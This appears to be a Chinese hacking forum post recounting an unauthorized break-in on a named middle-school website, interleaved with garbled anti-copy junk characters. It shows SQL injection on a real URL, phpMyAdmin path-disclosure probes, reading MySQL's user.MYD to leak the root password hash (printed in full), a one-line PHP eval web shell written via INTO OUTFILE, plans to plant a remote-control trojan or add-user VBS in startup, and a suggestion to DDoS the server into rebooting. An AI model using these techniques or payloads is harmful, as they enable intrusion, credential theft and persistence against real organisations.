友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
, j& v6 f3 b9 @0 U, t& ~发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！


( F! N# u( U) f# Z2 e( m  {
常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
' E1 R% u! ~1 N+ U$ H
6 N" E3 Y, r- s那么想可以直接写入shell ，getshell有几个条件：
4 N! E3 W$ y& N9 D0 j  @

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
' s8 \* V) G1 U* {6 d" c( f5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
1 j8 C& N9 j& B6 _' E  f7./phpmyadmin/libraries/mcrypt.lib.php   
! v8 u: V9 {! L8./phpmyadmin/libraries/export/xls.php  
5 U+ Z6 S, M' s" F+ x
4 d& m% S# U, _& i$ v  O均不行...........................

. U# y! U$ S- ]! ?7 G6 e御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

3 E8 Z$ [+ y2 B# Q9 z( M3 Z0 o权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
# G$ |0 U+ L0 X
默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

6 K! S" t6 Y8 B0 @http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
4 ~" ?* M  U3 f. _- y$ m
5 R0 l3 H) Z" b自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：

17---- r(0072)
/ F1 n( L9 L* u5 c- {. s6 m3 d8 G6 e18---- o(006f)
: D- }: o( r" |" @# g7 N6 E* x' Q$ I19---- o(006f)
$ b: ~; _# @% a: D20---- t(0074)
21---- *(002a)
22---- 8(0038)
23---- 2(0032)
24---- E(0045)
25---- 1(0031)
% h+ ^  D% ]. C% g) n' Y26---- C(0043)
) Z# s% S6 W8 U4 Q  E; j1 K27---- 5(0035)
+ v9 m1 R, @9 p  m( q28---- 8(0038)
/ y/ K$ N( u1 b9 X% k' i9 f" v# V29---- 2(0032)
30---- 8(0038)
; W4 y7 ]& A/ L7 I/ K* a31---- A(0041)
- w0 e' p- ~; G, n32---- 9(0039)
9 ]7 ~+ n3 J. I6 j) U6 I. J4 u33---- B(0042)
34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
$ m# A/ F- Y1 L# u, c0 s' K37---- 6(0036)
38---- 4(0034)
9 \; |4 C$ m- f" @2 K1 g8 [  _39---- 9(0039)
40---- 1(0031)
. e& [* }8 s1 g( b" W5 n41---- 1(0031)
7 O5 _# _/ {2 @/ R# Q42---- 5(0035)
3 F( X9 A- ~7 @0 |1 w43---- 3(0033)
5 O; o8 [; l8 R5 L' l$ \3 F44---- 5(0035)
7 n& x9 a. g$ U) `7 f+ A: m8 V45---- 9(0039)
46---- 8(0038)
: k6 I" t) N& q; L47---- F(0046)
48---- F(0046)
9 f( n# ?3 P# p; l  e' p49---- 4(0034)
50---- F(0046)
5 U$ G0 y/ i9 E( {! f, V5 b51---- 0(0030)
52---- 3(0033)
53---- 2(0032)
54---- A(0041)
7 _+ `# H- ~! ]% G2 w9 Z7 V55---- 4(0034)
56---- A(0041)
57---- B(0042)
58---- *(0044)
5 N4 h3 P( W3 L59---- *(0035)
60---- *(0041)
2 A# F) ?$ C( \, R3 b1 [61---- *0032)
) ^, H2 Y: j5 E" G5 U
解密后成功登陆phpmyamin
                          
- j* O8 C5 W# @3 K
7 @! m' r- ^! `  f% p                             
# O8 E) k/ f# m; L: x8 p7 {
+ d1 l( C* z! C" r3 c! `7 E1 t6 A找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

成功执行，拿下shell，菜刀连接：

服务器不支持asp,aspx,php提权无果...................
  x; `! _" @/ Z3 J5 O/ W5 d
! G( v% d5 M( N4 m但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

别名     administrators
, n4 c# z( H- t9 l+ z1 t  q注释     管理员对计算机/域有不受限制的完全访问权

成员

-------------------------------------------------------------------------------
) D" W* b: ~1 ^admin
! p& }0 x$ ]- P8 \- q" TAdministrator
slipper$
, T4 w, e5 |: S+ M& g$ nsqluser
' H* w) E8 T- o; g命令成功完成。
5 i! i3 D5 B6 Z. Y
服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................
! j; B* Q7 }; {2 h! s
      

/ C  d7 S& u$ q( r- \, w& w( h/ r) P

angel